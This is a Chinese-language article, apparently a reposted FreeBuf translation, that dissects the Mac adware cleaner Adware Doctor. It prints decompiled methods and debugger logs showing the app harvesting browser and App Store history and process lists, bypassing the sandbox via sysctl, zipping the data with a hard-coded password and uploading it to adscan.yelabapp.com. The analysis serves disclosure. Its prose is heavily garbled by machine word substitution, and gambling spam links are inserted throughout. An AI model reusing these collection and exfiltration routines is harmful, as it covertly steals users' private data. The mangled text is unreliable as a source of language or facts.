www.yabo10.com 19
科技 / 互联网

Mac App Store下架排行第一的付费安软

原标题:被指向中夏族民共和国服务器提供数据,Mac App Store下架排行第一的付费安软

前言

前不久有日媒报道,Mac App Store中付费安全软件中排行第一的Adware
Doctor被商讨职员开掘在未经顾客同意的情事下搜聚浏览历史,并将数据发送至位于中华夏族民共和国的服务器,之后被Mac
App Store下架。

在被下架以前,Adware
Doctor是一款广受顾客接待的新余接纳,意在保证客商的浏览器免受广告软件和恶心软件威逼。海外探究人口解构了本次发生的下架事件的前因后果。

Adware Doctor

在Adware
Doctor的鼓吹中,它是Mac客商抵御种种大面积广告软件勒迫的“最好应用”:

www.yabo10.com 1

在Mac App
Store中,这款应用程序相当受招待,在最抢手的应用程序中排名的榜单第四,因而连苹果Mac
App Store网址都列出了它的音讯:

www.yabo10.com 2

在“付费实用工具”分类中,Adware Doctor排行第一:

www.yabo10.com 3

事件解构

探讨人口运用静态深入分析(反编写翻译)和动态分析(网络监督、文件监控和调节和测量检验)的情势对那款应用程序举办了钻探,以下是经过和结果。

先是,切磋人口从Mac App Store下载 Adware Doctor,确认该应用程序(与Mac
App Store中的全体应用程序一样)由苹果例行签发:

www.yabo10.com 4

开首应用程序,观望到它经过HTTPS发出各个网络需要。举个例子,连接受adwareres.securemacos.com通过GET央求/AdwareDoctor/master.1.5.5.js:

www.yabo10.com 5

如图所示,下载的master.1.5.5.js文件包涵基本JSON配置数据:

{

“disable_rate”:false,

“disable_prescan”:false,

“sk_on”:false,

“faq_link”:“

}

单击应用程序分界面中的“Clean”按键会触发另一个到adwareres.securemacos.com的网络央浼,此番下载的是名称叫config1.5.0.js的第二个文件:

www.yabo10.com 6

此番下载的config1.5.0.js文书满含越多JSON,最值得注意的是那款软件的数据库的链接:

{

“update”:true,

“version”:“201808243”,

“url”:“https://adwareres.securemacos.com/patten/file201808243.db”

}

接下来是一个看起来很正规的数据库更新进度:

www.yabo10.com 7

商量职员查看了数据库的开始和结果,是加密的(相符反广告软件/反恶意软件的做法):

www.yabo10.com 8

动用调节和测量检验器捕获应用程序在内部存款和储蓄器中解密的公文,然后转储纯文本内容:

(lldb)

binaryContentMatchPatten = ({

md5 = (

48a96e1c00be257debc9c9c58fafaffe,

f1a19b8929ec88a81a6bdce6d5ee66e6,

3e653285b290c12d40982e6bb65928c1,

801e59290d99ecb39fd218227674646e,

8d0cd4565256a781f73aa1e68e2a63de,

e233edd82b3dffd41fc9623519ea281b,

1db830f93667d9c38dc943595dcc2d85,

browserHomePagePatten = (

{

name = “Chrome homepage: safefinder”;

patten = “Chrome.*feed\\.snowbitt\\.com.*publisher=tingnew”;

},

{

name = “Chrome homepage: safefinder”;

patten = “Chrome.*feed\\.snowbitt\\.com.*publisher=TingSyn”;

},

{

name = “Chrome homepage: safefinder”;

patten = “Chrome.*searchword.*/90/”;

},

亚搏娱乐app下载,filePathPatten = (

“/Applications/WebShoppers”,

“/Applications/WebShoppy”,

“/Applications/SoftwareUpdater”,

“/Applications/webshoppers”,

“~/Library/Application Support/WebTools”,

“~/Library/WebTools”,

“/Applications/WebTools”,

“/Applications/WebTools.app”,

“/Applications/SmartShoppy”,

“/Applications/ShopTool”,

“/Applications/ShoppyTool”,

“/Applications/EasyShopper”,

launchPathMatchPatten = (

“com.WebShoppers.agent.plist”,

“com.WebShoppy.agent.plist”,

“com.webshoppers.agent.plist”,

“com.SoftwareUpdater.agent.plist”,

whitelist = (

“~/Library/LaunchAgents/com.spotify.webhelper.plist”,

“/Library/LaunchDaemons/com.intel.haxm.plist”,

“/Library/LaunchDaemons/net.privatetunnel.ovpnagent.plist”,

“/Library/LaunchDaemons/com.mixlr.MixlrAudioLink.plist”,

“/Library/LaunchDaemons/com.mcafee.ssm.Eupdate.plist”,

“/Library/LaunchDaemons/com.mcafee.ssm.ScanFactory.plist”,

“/Library/LaunchDaemons/com.mcafee.ssm.ScanManager.plist”,

“/Library/LaunchDaemons/com.mcafee.virusscan.fmpd.plist”,

“/Library/LaunchDaemons/com.microsoft.autoupdate.helper.plist”,

“/Library/LaunchAgents/com.microsoft.update.agent.plist”,

“/Library/LaunchDaemons/com.crashplan.engine.plist”

这么些特色看起来是一款反广告软件,而且哈希值确实与已知的广告软件特别:

www.yabo10.com 9

例如Adware.MAC.Pirrit:

www.yabo10.com 10

归来Adware Doctor应用分界面,它已计划好清理客商的系统:

www.yabo10.com 11

以至于上边一步并不曾出现格外,但后边对难堪了。

第一,在运维文件监视器(举例MacOS内置的fs_usage)和对含蓄历史记录的文本进行过滤(不区分轻重缓急写)后,一些卓越的文件访谈历史显现出来:

# fs_usage -w -f filesystem | grep “Adware Doctor” | grep -i history

www.yabo10.com,Adware Doctor.44148 open ~/Library/Application
Support/CallHistoryTransactions

Adware Doctor.44148 open ~/Library/Application Support/CallHistoryDB

Adware Doctor.44148 RdData[A]
/dev/disk1s1/Users/user/Library/Safari/History.db

Adware Doctor.44148 lstat64 /Users/user/Library/Application
Support/Google/Chrome/Default/History

Adware Doctor.44148 open
~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history.zip

Adware Doctor.44148 lstat64
~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history/psCommonInfo

Adware Doctor.44148 WrData[A]
~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history/appstoreHistory

Adware Doctor.44148 WrData[A]
~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history/safariHistory

Adware Doctor.44148 WrData[A]
~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history/chromeHistory

Adware Doctor.44148 WrData[A]
~/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history/firefoxHistory

运转进程监视器(比方开源的ProcInfo实用程序),能够洞察到Adware
Doctor使用内建zip实用程序创制受密码珍爱的history.zip存档:

# ./procInfo

process start:

pid: 2634

path: /bin/bash

args: (

“/bin/bash”,

“-c”,

“zip -r –quiet -P webtool
\”/Users/user/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history.zip\”
\”/Users/user/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history\” > /dev/null”

)

运用网络代理监视器(查理 Proxy)捕获Adware
Doctor到adscan.yelabapp.com的连年尝试:

www.yabo10.com 12

通过编写制定系统的/etc/hosts文件,将此呼吁重定向到商讨职员决定的服务器,捕获到Adware
Doctor尝试上传history.zip文件:

# python https.py

listening for for HTTPS requests on port:443

192.168.86.76 – – [20/Aug/2018 10:53:24] “POST /1/checkadware
HTTP/1.1” 200 –

Headers:

Host: adscan.yelabapp.com

Content-Type: multipart/form-data;
boundary=Boundary-E2AE6908-4FC6-4C1D-911A-0B34F844C510

Connection: keep-alive

Accept: */*

User-Agent: Adware%20Doctor/1026 CFNetwork/902.1 Darwin/17.7.0 (x86_64)

Content-Length: 15810

Accept-Language: en-us

Accept-Encoding: br, gzip, deflate

Path: /1/checkadware

Attachment: ‘history.zip’ (length: 15810)

待上传的“history.zip”文件受密码爱惜:

www.yabo10.com 13

回放进度监视器的输出,密码被发送到内建的zip实用程序:zip -r –quiet -P
webtool …。

密码也被编码到应用程序的二进制文件中,由此反编写翻译二进制文件即可得到密码。

输入webtool作为密码解压文件:

www.yabo10.com 14

翻开解压出来的开始和结果,Adware Doctor在暗地里采摘客商的浏览器历史记录:

$ cat com.yelab.Browser-Sweeper/Data/Library/Application\
Support/com.yelab.Browser-Sweeper/history/chromeHistory

Person 1:

2018-08-20 21:19:57

2018-08-20 21:19:36

$ cat com.yelab.Browser-Sweeper/Data/Library/Application\
Support/com.yelab.Browser-Sweeper/history/safariHistory

08:29:41

1397-06-02 08:29:20

深远深入分析

见状此间,有四个难点亟需解答:

它怎么绕过Mac App Store的沙盒机制来拜会客商的公文?

它什么采摘客户的浏览器历史记录?

它还收罗了什么样系统消息和个人身份新闻(PII)?

从安全和隐秘的角度来看,从官方Mac App
Store安装应用程序的首要性优势有两点:

前后相继通过苹果官方检查核对和签发;

先后在沙盒中运作。

当应用程序在沙箱中运转时,能够访谈的公文或客商音信特别有限,应该不能够访谈客户的浏览器历史记录,但那边Adware
Doctor做到了。

通过工具(WhatsYourSign)查看该应用程序的权位,包涵:com.apple.security.files.user-selected.read-write:

www.yabo10.com 15

那项权限意味着应用程序能够央求有个别文件的权能,并且得到确定的顾客许可后,对文本实行读/写操作。Adware
Doctor在率先次运转时,会呈请访谈顾客的主目录以及下边的富有文件和目录:

www.yabo10.com 16

那是通过[MainWindowController showFileAccess]艺术实现的:

/ * @class MainWindowController * /

– (void)showFileAccess {

r15 = self;

var_30 = [[AppSandboxFileAccess fileAccess] retain];

r13 = [[AppSandboxFileAccess fileAccess] retain];

rbx = [[BSUtil realHomeDirectory] retain];

r14 = [r13 hasAccessPremisionPath:rbx];

在AppSandboxFileAccess类的协理下:

www.yabo10.com 17

在调节和测量检验器(lldb)中,观看客户主目录的拜候尝试:

Adware Doctor -[AppSandboxFileAccess hasAccessPremisionPath:]:

-> 0x10000cebf <+0>: pushq %rbp

0x10000cec0 <+1>: movq %rsp, %rbp

0x10000cec3 <+4>: pushq %r15

0x10000cec5 <+6>: pushq %r14

(lldb) po $rdi

(lldb) x/s $rsi

0x10006a147: “hasAccessPremisionPath:”

(lldb) po $rdx

/Users/user

今后,Adware
Doctor能够合法访问顾客的文本和目录,例如扫描以搜索恶意代码。不过,一旦客商点击允许,Adware
Doctor将具有对负有客户文件的漫天拜见权限,它利用了各类收罗种类和顾客音讯的艺术。即使某个(比方进度列表)可能确实是用于反恶意软件或反广告软件的操作,但别的顾客音信(比方顾客的浏览历史记录)违反了适度从紧的Mac
App Store法规。

收罗格局在ACEAdwareCleaner类中贯彻,并取名称叫collect *:

www.yabo10.com 18

逆向一下局地方法

先是是collectSample方法。此格局查询应用程序下载的数据库。看起来它用于搜索访问样本中钦点的文书:

– (void)collectSample {

rbx = [r15 pattenDic];

r14 = [rbx valueForKey:@“sample”];

在调节和测量检验器中跳过此代码,并检讨示例键的未加密值:

(lldb)“/ Application / Adware Doctor.app”

po $ rax

<__ NSArrayM 0x10732b5e0>(

NAME =`whoami`; echo
/Users/”$NAME”/Library/LaunchAgents/com.apple.Yahoo.plist;

它正在客户的LaunchAgents目录中寻觅名叫com.apple.Yahoo.plist的文书。在探索引擎中搜索“com.apple.Yahoo.plist”,跳出的音信与门罗币挖矿木马有关。在VirusTotal上能够找到相关文件,但看起来没难题:

www.yabo10.com 19

collectPSCommonInfoToFile方法。反编写翻译相关文书后获取了字符串和详尽的章程名称,揭破了指标:

/* @class ACEAdwareCleaner */

-(void)collectPSCommonInfoToFile:(void *)arg2 {

var_38 = [arg2 retain];

r14 = [[NSMutableString alloc] init];

[r14 appendString:@”===System===\n”];

rbx = [[ACECommon operatingSystem] retain];

[r14 appendFormat:@”%@\n”];

[rbx release];

[r14 appendString:@”===OS UpTime===\n”];

rbx = [[ACECommon getSystemUpTime] retain];

[r14 appendFormat:@”%@\n”];

[rbx release];

[r14 appendString:@”===Launch===\n”];

rbx = [[self readLaunchFolder:@”/Library/LaunchAgents”] retain];

[r14 appendFormat:@”%@\n”];

[rbx release];

rbx = [[self readLaunchFolder:@”/Library/LaunchDaemons”] retain];

[r14 appendFormat:@”%@\n”];

[rbx release];

r15 = [[ACECommon realHomeDirectory] retain];

r13 = [[NSString stringWithFormat:@”%@/Library/LaunchAgents”, r15]
retain];

rbx = [[self readLaunchFolder:r13] retain];

[r14 appendFormat:@”%@\n”];

[rbx release];

[r13 release];

[r15 release];

[r14 appendString:@”\n===Applications===\n”];

rbx = [[ACECommon fileStringWithPath:@”/Applications”] retain];

[r14 appendString:rbx];

[rbx release];

[r14 appendString:@”\n===process===\n”];

rbx = [[ACECommon collectProcessList] retain];

[r14 appendString:rbx];

[rbx release];

[r14 appendString:@”\n===process2===\n”];

rbx = [[ACECommon collectProcessList2] retain];

[r14 appendString:rbx];

[rbx release];

[r14 writeToFile:var_38 atomically:0x1 encoding:0x4 error:0x0];

[var_38 release];

[r14 release];

return;

}

能够手动剖析那个代码,但轻巧地让它试行并在下一行(邻近函数末尾)设置断点要轻松得多:

(lldb)po $ rdx

/Users/user/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support / com.yelab.Browser-Sweeper / history / psCommonInfo

请小心那么些psCommonInfo也被exfilt到adscan.yelabapp.com(在history.zip文书档案中):

$ cat psCommonInfo

===System===

Version 10.13.6 (Build 17G65)

===OS UpTime===

1hour, 10minute, 31second

===Launch===

/Library/LaunchAgents/com.vmware.launchd.vmware-tools-userd.plist

444 root wheel

===Applications===

/Applications/DVD Player.app(1396-07-20 02:11:55 +0000)

/Applications/Siri.app(1396-07-27 03:17:13 +0000)

/Applications/QuickTime Player.app(1396-08-19 02:31:30 +0000)

/Applications/Chess.app(1396-06-15 01:20:21 +0000)

/Applications/Photo Booth.app(1396-04-25 01:50:31 +0000)

/Applications/Adware Doctor.app(1397-03-20 09:59:27 +0000)

….

===process2===

processID processName userID userName command

Mac App Store下架排行第一的付费安软。1759 bash 501 user /bin/bash

1758 login 0 root /usr/bin/login

1730 silhouette 501 user /usr/libexec/silhouette

1709 mdwrite 501 user /System/Library/Frame

….

固然如此Adware
Doctor获得了经过com.apple.security.files.user-selected.read-write权限和可想而知的客户许可来枚举顾客文件,但依附沙箱设计,它依旧鞭长莫及列出任何正在运作的进程。

回溯一下collectPSCommonInfoToFile,调用以下三种艺术:

[r14 appendString:@“\ n === process === \ n”];

rbx = [[ACECommon collectProcessList] retain];

[r14 appendString:@“\ n === process2 === \ n”];

rbx = [[Mac App Store下架排行第一的付费安软。ACECommon collectProcessList2] retain];

主意collectProcessList尝试通过嵌入的ps命令枚举全部正在运转的历程:

(lldb) po $rdi

(lldb) po [$rdi launchPath]

/bin/sh

(lldb) po [$rdi arguments]

<__NSArrayI 0x1002851f0>(

-c,

ps -e -c -o “pid uid user args”

)

被macOS应用程序沙箱阻止(拒绝),因为枚举正在运营的经过(来自沙箱)是“掩盖”:

/bin/sh: /bin/ps: Operation not permitted

Adware Doctor使用了collectProcessList2方法:

Mac App Store下架排行第一的付费安软。+(void *)collectProcessList2

{

rax = sub_1000519ad(&var_1068, &var_10A0,

@”processID\t\t\t processName\t\t\t userID\t\t\t
userName\t\t\t command\n”, rcx, r8, r9);

var_1070 = var_1068;

do {

proc_pidpath(*(int32_t *)(r14 – 0xcb), &var_1030, 0x1000);

} while (var_1088 > rax);

}

调用sub_一千519ad然后迭代该函数重回的有些列表,调用proc_pidpath。sub_一千519ad归来八个历程ID列表:

000000010007df90 dd 0x00000001 ;CTL_KERN

000000010007df94 dd 0x0000000e ;KERN_PROC

000000010007df98 dd 0x00000000 ;KERN_PROC_ALL

int sub_1000519ad(int arg0, int arg1, int arg2, int arg3, int arg4, int
arg5)

{

rax = sysctl(0x10007df90, 0x3, 0x0, r13, 0x0, 0x0);

if ((r12 ^ rax) == 0x1){

__assert_rtn(“GetBSDProcessList”,

“/Users/build1/Browser-Sweeper/src/Browser
Sweeper/Pods/PodACE/Engine/ACECommon.m”, …

}

rbx = malloc(0x0);

rax = sysctl(0x10007df90, 0x3, rbx, r13, 0x0, 0x0);

sysctl函数的调用加上字符串GetBSDProcessList给出了经过列表。它是苹果的GetBSDProcessList代码,可从应用程序沙箱中拿走进度列表,也便是说
Adware Doctor用来绕沙箱的代码直接来自苹果。

今昔让我们看看Adware
Doctor怎么样采摘客户的浏览器历史记录。使用collectBrowserHistoryAndProcess方法,调用:

collectSafariHistoryToFile

collectChromeHistoryToFile

firefoxHistory

那几个办法中的每贰个都含有用于提取浏览器历史记录的代码。

对于Safari来讲,那将调用剖析其History.db文件:

+(void)collectSafariHistoryToFile:(void *)arg2 {

if ([ACECommon appInstalledByBundleId:@”com.apple.Safari”] != 0x0) {

r15 = [[ACECommon realHomeDirectory] retain];

rbx = [[r15
stringByAppendingPathComponent:@”Library/Safari/History.db”] retain];

r14 = [[FMDatabaseQueue databaseQueueWithPath:rbx] retain];

;parse database

}

else {

r14 = [[@”Safari not installed.” dataUsingEncoding:0x4] retain];

[r12 writeData:r14];

[r14 release];

[r12 closeFile];

}

}

该collectChromeHistoryToFile涉及到多少个文本,但基本上能够归纳为列举Chrome个人资料,然后剖判Chrome历史数据。

+(void)collectChromeHistoryToFile:(void *)arg2 {

r13 = [[NSString stringWithFormat:@”Library/Application
Support/Google/Chrome/%@/History”] retain];

rbx = [[rbx stringByAppendingPathComponent:r13] retain];

[r14 copyItemAtPath:rbx toPath:var_170 error:0x0];

rbx = [[FMDatabaseQueue databaseQueueWithPath:var_170] retain];

}

末段,在解析各类配置文件的places.sqlite数据库在此之前,collectFirefoxHistoryToFile方法枚举任何Firefox配置文件:

+(void)collectFirefoxHistoryToFile:(void *)arg2 {

r12 = [[NSString stringWithFormat:@”Library/Application
Support/Firefox/Profiles/%@/places.sqlite”] retain];

r15 = [[rbx stringByAppendingPathComponent:r12] retain];

r14 = [[FMDatabaseQueue databaseQueueWithPath:r15] retain];

该应用程序还应该有多个名称叫collectAppStoreHistoryToFile的秘技,它将尝试在App
Store App中收获顾客最近的具备寻找记录:

+(void)collectAppStoreHistoryToFile:(void *)arg2 {

15 = [[rbx
stringByAppendingPathComponent:@”Library/Containers/com.apple.appstore/Data/Library/Caches/com.apple.appstore/WebKitCache/Version
11/Blobs”, 0x0, 0x0] retain];

r12 = [r14 initWithFormat:@”%@/Library/Application
Support/%@/appStoreData”, r15, rbx]

ar_1A0 = @[@”-c”, @”grep search.itunes * | sed
‘s/.*\(https:\/\/search\.itunes\.apple\.com.*q=.*\)\”
.*/\1/'”)]

}

在访谈完顾客数据后将兼具故事情节都缩小到history.zip文件发送:

(lldb) po $rdi

(lldb) po [$rdi launchPath]

/bin/bash

(lldb) po [$rdi arguments]

<__NSArrayI 0x100352480>(

-c,

zip -r –quiet -P webtool
“/Users/user/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history.zip”
“/Users/user/Library/Containers/com.yelab.Browser-Sweeper/Data/Library/Application
Support/com.yelab.Browser-Sweeper/history” > /dev/null

)

此文件以及包蕴软件列表的JSON
blob(已下载的.dmgs或.pkgs以及从哪里下载),然后经过调用sendPostRequestWithSuffix方法上传出服务器(请留意API端点:checkadware)

[var_1F0 sendPostRequestWithSuffix:@”checkadware” params:r12
file:rbx];

[

{

“content”: “\/Users\/user\/Downloads\/googlechrome.dmg\n1397-06-02
21:15:46 +0000\n(\n
\”https:\/\/dl.google.com\/chrome\/mac\/stable\/GGRO\/googlechrome.dmg\”,\n
\”https:\/\/www.google.com\/chrome\/\”\n)\n5533641bc4cc7af7784565ac2386a807\n”

},{

“content”:
“\/Users\/user\/Downloads\/charles-proxy-4.2.6.dmg\n1397-06-02
20:48:18 +0000\n(\n
\”https:\/\/www.charlesproxy.com\/assets\/release\/4.2.6\/charles-proxy-4.2.6.dmg\”,\n
\”https:\/\/www.charlesproxy.com\/latest-release\/download.do\”\n)\nde043b43c49077bbdce75de22e2f2d54\n”

},{

“content”: “\/Users\/user\/Downloads\/Firefox
61.0.2.dmg\n1397-06-02 21:16:08 +0000\n(\n
\”https:\/\/download-installer.cdn.mozilla.net\/pub\/firefox\/releases\/61.0.2\/mac\/en-US\/Firefox%2061.0.2.dmg\”,\n
\”https:\/\/www.mozilla.org\/en-US\/firefox\/download\/thanks\/?v=a\”\n)\n65096904bf80c4dd12eb3ba833b7db8d\n”

},

]

–Boundary-D779386A-2A17-4264-955A-94C5FC6F5AFA

Content-Disposition: form-data; name=”attachment”;
filename=”history.zip”

Content-Type: application/zip

到了这里,客商数量就发到中夏族民共和国的服务器上去了。

结语

Adware Doctor的一言一行违背了苹果 Mac App
Store严谨的条条框框和宗旨。比方,在“App Store法规和指南”
的“数据收罗和仓储”部分建议:

采撷客户或行使数据的应用程序必需保险客户的同意;

采纳必得重申客户的权能设置,并不是筹划棍骗或迫使顾客同意不须要的数目访谈;

将从开垦人士安插中删去使用其应用程序偷偷发掘私人数据的开采人士。

*参照来源:theregister,Freddy编写翻译整理,转发请评释来源
FreeBuf.COM。再次回到和讯,查看更加多

网编:

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关文章

网站地图xml地图